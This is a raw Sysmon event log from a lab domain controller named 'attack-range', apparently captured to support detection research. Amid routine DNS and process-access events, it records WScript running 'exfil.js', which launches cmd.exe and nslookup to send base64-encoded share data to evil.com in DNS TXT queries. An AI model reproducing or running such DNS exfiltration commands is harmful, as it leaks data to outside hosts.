AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52735- 354300x8000000000000000200719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.768{00000000-0000-0000-0000-000000000000}2632<unknown process>-udptruefalse127.0.0.1-52735-false127.0.0.1-53domain 354300x8000000000000000200718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.768{00000000-0000-0000-0000-000000000000}2632<unknown process>-udpfalsefalse127.0.0.1-52734-false127.0.0.1-53domain 354300x8000000000000000200717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.767{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52734- 354300x8000000000000000200716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.767{00000000-0000-0000-0000-000000000000}2632<unknown process>-udptruefalse127.0.0.1-52734-false127.0.0.1-53domain 354300x8000000000000000200715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.767{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52733- 354300x8000000000000000200714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.767{00000000-0000-0000-0000-000000000000}2632<unknown process>-udptruefalse127.0.0.1-52733-false127.0.0.1-53domain 354300x8000000000000000200713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.684{00000000-0000-0000-0000-000000000000}7320<unknown process>-udpfalsefalse127.0.0.1-52732-false127.0.0.1-53domain 354300x8000000000000000200712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52732- 354300x8000000000000000200711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.683{00000000-0000-0000-0000-000000000000}7320<unknown process>-udptruefalse127.0.0.1-52732-false127.0.0.1-53domain 354300x8000000000000000200710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52731- 354300x8000000000000000200709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.681{00000000-0000-0000-0000-000000000000}7320<unknown process>-udptruefalse127.0.0.1-52731-false127.0.0.1-53domain 354300x8000000000000000200708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.681{00000000-0000-0000-0000-000000000000}7320<unknown process>-udpfalsefalse127.0.0.1-52730-false127.0.0.1-53domain 354300x8000000000000000200707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.680{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52730- 354300x8000000000000000200706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.680{00000000-0000-0000-0000-000000000000}7320<unknown process>-udptruefalse127.0.0.1-52730-false127.0.0.1-53domain 354300x8000000000000000200705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.592{00000000-0000-0000-0000-000000000000}7460<unknown process>-udpfalsefalse127.0.0.1-52729-false127.0.0.1-53domain 354300x8000000000000000200704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.592{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52729- 354300x8000000000000000200703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.591{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52728- 354300x8000000000000000200702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.591{00000000-0000-0000-0000-000000000000}7460<unknown process>-udpfalsefalse127.0.0.1-52727-false127.0.0.1-53domain 354300x8000000000000000200701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.591{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52727- 354300x8000000000000000200700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.591{00000000-0000-0000-0000-000000000000}7460<unknown process>-udptruefalse127.0.0.1-52727-false127.0.0.1-53domain 354300x8000000000000000200699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.490{00000000-0000-0000-0000-000000000000}7432<unknown process>-udpfalsefalse127.0.0.1-52726-false127.0.0.1-53domain 354300x8000000000000000200698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.264{00000000-0000-0000-0000-000000000000}2600<unknown process>-udptruefalse127.0.0.1-52718-false127.0.0.1-53domain 354300x8000000000000000200697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{00000000-0000-0000-0000-000000000000}7992<unknown process>-udptruefalse127.0.0.1-52712-false127.0.0.1-53domain 10341000x8000000000000000200696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-17C0-629A-9040-000000005F02}62321700C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9140-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9140-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.433{2E1864BB-17C0-629A-8F40-000000005F02}51687300C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-9140-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.441{2E1864BB-17C0-629A-9140-000000005F02}4832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-8F40-000000005F02}5168C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwka.tmp 2>&1 10341000x8000000000000000200688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.417{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9040-000000005F02}6232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.417{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9040-000000005F02}6232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.415{2E1864BB-17C0-629A-9040-000000005F02}62321700C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8F40-000000005F02}5168C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9040-000000005F02}6232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8F40-000000005F02}5168C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-17A1-629A-783D-000000005F02}55526864C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-8F40-000000005F02}5168C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.398{2E1864BB-17C0-629A-8F40-000000005F02}5168C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwka.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.395{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcjxyiu.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.364{2E1864BB-17C0-629A-8D40-000000005F02}32884484C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8E40-000000005F02}3448C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 